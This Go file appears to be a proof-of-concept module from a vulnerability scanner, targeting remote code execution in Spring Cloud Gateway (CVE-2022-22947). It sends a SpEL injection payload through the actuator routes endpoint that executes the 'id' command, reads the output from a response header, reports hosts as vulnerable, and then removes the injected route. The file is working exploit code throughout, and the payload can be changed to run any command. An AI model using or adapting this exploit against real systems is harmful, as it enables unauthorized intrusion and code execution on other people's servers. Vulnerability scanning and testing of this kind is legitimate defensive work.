package poc

import (
	"fmt"
	"github.com/fatih/color"
	"ssp/common"
	"strings"
)

func CVE_2022_22947(url string, proxyURL string) {
	endpoint1 := "actuator/gateway/routes/hacktest"
	endpoint2 := "actuator/gateway/refresh"

	headers1 := map[string]string{
		"Accept-Encoding": "gzip, deflate",
		"Accept":          "*/*",
		"Accept-Language": "en",
		"User-Agent":      common.GetRandomUserAgent(),
		"Content-Type":    "application/json",
	}
	headers2 := map[string]string{
		"User-Agent":   common.GetRandomUserAgent(),
		"Content-Type": "application/x-www-form-urlencoded",
	}

	payload := `{
		"id": "hacktest",
		"filters": [{
			"name": "AddResponseHeader",
			"args": {"name": "Result", "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
		}],
		"uri": "http://example.com",
		"order": 0
	}`

	urlTest1 := url + endpoint1
	_, _, err := common.MakeRequest(urlTest1, "POST", proxyURL, headers1, payload)
	if err != nil {
		color.Yellow("[-] %s 请求失败，跳过漏洞检查\n", url)

		return
	}

	urlTest2 := url + endpoint2
	_, _, err = common.MakeRequest(urlTest2, "POST", proxyURL, headers2, "")
	if err != nil {
		color.Yellow("[-] %s 请求失败，跳过漏洞检查\n", url)
		return
	}

	urlTest3 := url + endpoint1
	_, body3, err := common.MakeRequest(urlTest3, "GET", proxyURL, headers2, "")
	if err != nil {
		fmt.Println("Error creating GET request:", err)
		return
	}

	if strings.Contains(string(body3), "uid=") && strings.Contains(string(body3), "gid=") && strings.Contains(string(body3), "groups=") {
		common.PrintVulnerabilityConfirmation("CVE-2022-22947", url, "Null", "3")
		common.Vulnum++

		_, _, err := common.MakeRequest(url+endpoint1, "DELETE", proxyURL, headers2, "")
		if err != nil {
			return
		}

		_, _, err = common.MakeRequest(url+endpoint2, "POST", proxyURL, headers2, "")
		if err != nil {
			return
		}
	} else {
		color.Yellow("[-] %s 未发现CVE-2022-22947远程命令执行漏洞\n", url)
	}

}
